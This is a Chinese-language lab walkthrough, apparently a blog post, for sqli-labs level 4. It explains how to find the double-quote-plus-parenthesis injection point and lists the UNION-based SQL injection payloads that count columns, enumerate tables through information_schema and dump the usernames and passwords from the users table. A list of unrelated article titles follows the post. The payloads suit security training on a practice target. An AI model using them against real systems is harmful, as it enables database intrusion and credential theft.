当前位置: 首页 > news >正文

sqli-labs靶场第四关——“)闭合

一:确定注入类型

输入?id=1,显示正常,单引号测试 ?id=1',单引号括号测试?id=1')均无问题

输入双引号测试:

?id=1"--+

报错如下: 

报错显示 " " ),说明为双引号字符型,并且括号没闭合

输入双引号括号

?id=1")--+

我们可以发现页面恢复正常,说明第四关注入是双引号+括号型

二:开始注入攻击

1.确定列数

?id=1") order by 3--+

数到4开始报错,所以有三列

2.找回显位

?id=-1") union select 1,2,3--+

3.获取数据库信息(数据库名称,mysql版本号) 

4.获取所有表名

?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

5.爆出所有数据

?id=-1")%20union%20select%201,group_concat(username),group_concat(password)%20from%20users--+

 

❀❀❀ 完结撒花!!!❀❀❀

相关文章:

  • deepseek梳理java高级开发工程师微服务面试题
  • SQL、Oracle 和 SQL Server 的比较与分析
  • 一次讲清 FP32 / FP16 / BF16 / INT8 / INT4
  • MySQL 8.0 OCP(1Z0-908)英文题库(31-40)
  • UI-TARS Desktop:用自然语言操控电脑,AI 重新定义人机交互
  • YOLO11解决方案之物体模糊探索
  • 自然语言生成在商业智能中的应用实践
  • 【工作记录】Kong Gateway 入门篇之部署及简单测试
  • 基于javaweb的SpringBoot爱游旅行平台设计和实现(源码+文档+部署讲解)
  • 【github】主页显示star和fork
  • STM32 __rt_entry
  • 详解注意力机制
  • RustDesk:开源电脑远程控制软件
  • Datawhale 5月coze-ai-assistant 笔记1
  • 水滴Android面经及参考答案
  • 系统稳定性之上线三板斧
  • Spark的缓存
  • 青少年编程与数学 02-019 Rust 编程基础 10课题、函数、闭包和迭代器
  • Django 中时区的理解
  • springboot配置tomcat端口
  • 美国和沙特签署上千亿美元军售协议
  • 习近平举行仪式欢迎巴西总统卢拉访华
  • 科普|揭秘女性压力性尿失禁的真相
  • 朝着解决问题的正确方向迈进——中美经贸高层会谈牵动世界目光
  • 他站在当代思想的地平线上,眺望浪漫主义的余晖
  • 湛江霞山通报渔船火灾:起火船舶共8艘,无人员伤亡或被困